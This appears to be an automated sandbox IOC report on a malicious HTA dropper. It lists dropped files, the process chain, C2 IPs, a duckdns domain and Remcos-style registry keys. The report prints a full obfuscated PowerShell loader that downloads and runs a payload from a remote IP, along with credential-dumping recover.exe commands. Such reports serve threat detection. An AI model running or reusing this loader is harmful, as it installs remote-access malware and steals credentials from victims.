IOC Report
goodgirlwithbestbattingwithgoodthings.hta

goodgirlwithbestbattingwithgoodthings.hta

HTML document, ASCII text, with very long lines (3196), with CRLF line terminators

initial sample

C:\Windows\Temp\horripilant.bat

DOS batch file, ASCII text, with CRLF line terminators

dropped

C:\Windows\Temp\undertipped.vbs

ASCII text, with CRLF line terminators

dropped

C:\Windows\SysWOW64\mshta.exe

mshta.exe "C:\Users\user\Desktop\goodgirlwithbestbattingwithgoodthings.hta"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Windows\Temp\horripilant.bat"

C:\Windows\SysWOW64\wscript.exe

wscript //nologo "C:\Windows\Temp\undertipped.vbs"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bj#G8#YwBp#G4#ZQBy#G8#I##9#C##JwB0#Hg#d##u#HM#ZwBu#Gk#a#B0#GQ#bwBv#Gc#a#B0#Gk#dwBn#G4#aQB0#HQ#YQBi#HQ#cwBl#GI#a#B0#Gk#dwBs#HI#aQBn#GQ#bwBv#Gc#LwBl#G0#bwBo#GU#YwBp#G4#LwBw#H##bQBh#Hg#Lw#y#D##MQ#u#DQ#Mg#x#C4#Ng#0#C4#OQ#w#DI#Lw#v#Do#c#B0#HQ#a##n#Ds#J#Bw#HI#aQBt#Gk#bgB2#GE#cgBp#GE#bgB0#C##PQ#g#CQ#YwBv#GM#aQBu#GU#cgBv#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bl#Gw#YQBz#HQ#aQBj#Gk#cwBl#C##PQ#g#Cc#a#B0#HQ#c##6#C8#Lw#y#DE#Nw#u#DE#NQ#0#C4#NQ#1#C4#MQ#4#DU#LwB4#GE#bQBw#H##LwBj#C8#bgBl#Hc#XwBp#G0#YQBn#GU#LgBq#H##Zw#n#Ds#J#Bp#G0#YQBy#Gk#I##9#C##TgBl#Hc#LQBP#GI#agBl#GM#d##g#FM#eQBz#HQ#ZQBt#C4#TgBl#HQ#LgBX#GU#YgBD#Gw#aQBl#G4#d##7#CQ#eQBh#HI#bQB1#Gw#awBh#HM#I##9#C##J#Bp#G0#YQBy#Gk#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#ZQBs#GE#cwB0#Gk#YwBp#HM#ZQ#p#Ds#J#Bz#H##bwBv#G4#YgBv#Hc#b#Bz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#eQBh#HI#bQB1#Gw#awBh#HM#KQ#7#CQ#YQBu#HQ#a#By#G8#c#Bv#H##a#Bp#Gw#aQBj#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bt#G8#b#Bl#GM#dQBs#GU#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#Bx#HU#YQBp#HM#eQ#g#D0#I##k#HM#c#Bv#G8#bgBi#G8#dwBs#HM#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bh#G4#d#Bo#HI#bwBw#G8#c#Bo#Gk#b#Bp#GM#KQ#7#CQ#N#BQ#Gw#ZQBh#HM#ZQ#g#D0#I##k#HM#c#Bv#G8#bgBi#G8#dwBs#HM#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bt#G8#b#Bl#GM#dQBs#GU#cw#p#Ds#J#Bx#HU#YQBp#HM#eQ#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#DQ#U#Bs#GU#YQBz#GU#I##t#Gc#d##g#CQ#cQB1#GE#aQBz#Hk#Ow#k#HE#dQBh#Gk#cwB5#C##Kw#9#C##J#Bh#G4#d#Bo#HI#bwBw#G8#c#Bo#Gk#b#Bp#GM#LgBM#GU#bgBn#HQ#a##7#CQ#ZgBv#HU#bgBk#GU#cg#g#D0#I##k#DQ#U#Bs#GU#YQBz#GU#I##t#C##J#Bx#HU#YQBp#HM#eQ#7#CQ#aQBu#GY#b#Bh#G0#aQBu#Gc#b#B5#C##PQ#g#CQ#cwBw#G8#bwBu#GI#bwB3#Gw#cw#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bx#HU#YQBp#HM#eQ#s#C##J#Bm#G8#dQBu#GQ#ZQBy#Ck#Ow#k#GM#eQBz#HQ#aQBn#GU#cgBv#HU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bp#G4#ZgBs#GE#bQBp#G4#ZwBs#Hk#KQ#7#CQ#Z#Bl#HY#aQB0#GE#d#Bp#G8#bg#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#Bj#Hk#cwB0#Gk#ZwBl#HI#bwB1#HM#KQ#7#CQ#c#Bv#HM#d#Bw#Gw#aQBv#GM#ZQBu#GU#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bw#HI#aQBt#Gk#bgB2#GE#cgBp#GE#bgB0#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBD#GE#cwBQ#G8#b##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#y#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Windows\SysWOW64\recover.exe

C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\basblazcozkoojcy"

C:\Windows\SysWOW64\recover.exe

C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\evflltkvchcbypqcclkw"

C:\Windows\SysWOW64\recover.exe

C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\oxleeluxypugadmglvwxccv"

http://217.154.55.185/xampp/c/new_image.jpg

217.154.55.185

http://209.46.124.102/xampp/nicehome/goodgirlwithbestbattingwithgoodthings.txt

209.46.124.102

goodgirlfriendgivenmebestgiftgorentireti.duckdns.org

goodgirlfriendgivenmebestgiftgorentireti.duckdns.org

192.3.232.40

209.46.124.102

unknown

United States

217.154.55.185

unknown

United Kingdom

192.3.232.40

goodgirlfriendgivenmebestgiftgorentireti.duckdns.org

United States

HKEY_CURRENT_USER\SOFTWARE\Rmc-7QO18R

exepath

HKEY_CURRENT_USER\SOFTWARE\Rmc-7QO18R

licence

HKEY_CURRENT_USER\SOFTWARE\Rmc-7QO18R

time

HKEY_CURRENT_USER\SOFTWARE\Rmc-7QO18R

UID

3900000

unclassified section

page execute and read and write

400000

remote allocation

page execute and read and write

F18000

heap

page read and write

5EB3000

trusted library allocation

page read and write

5AF7000

trusted library allocation

page read and write

400000

system

page execute and read and write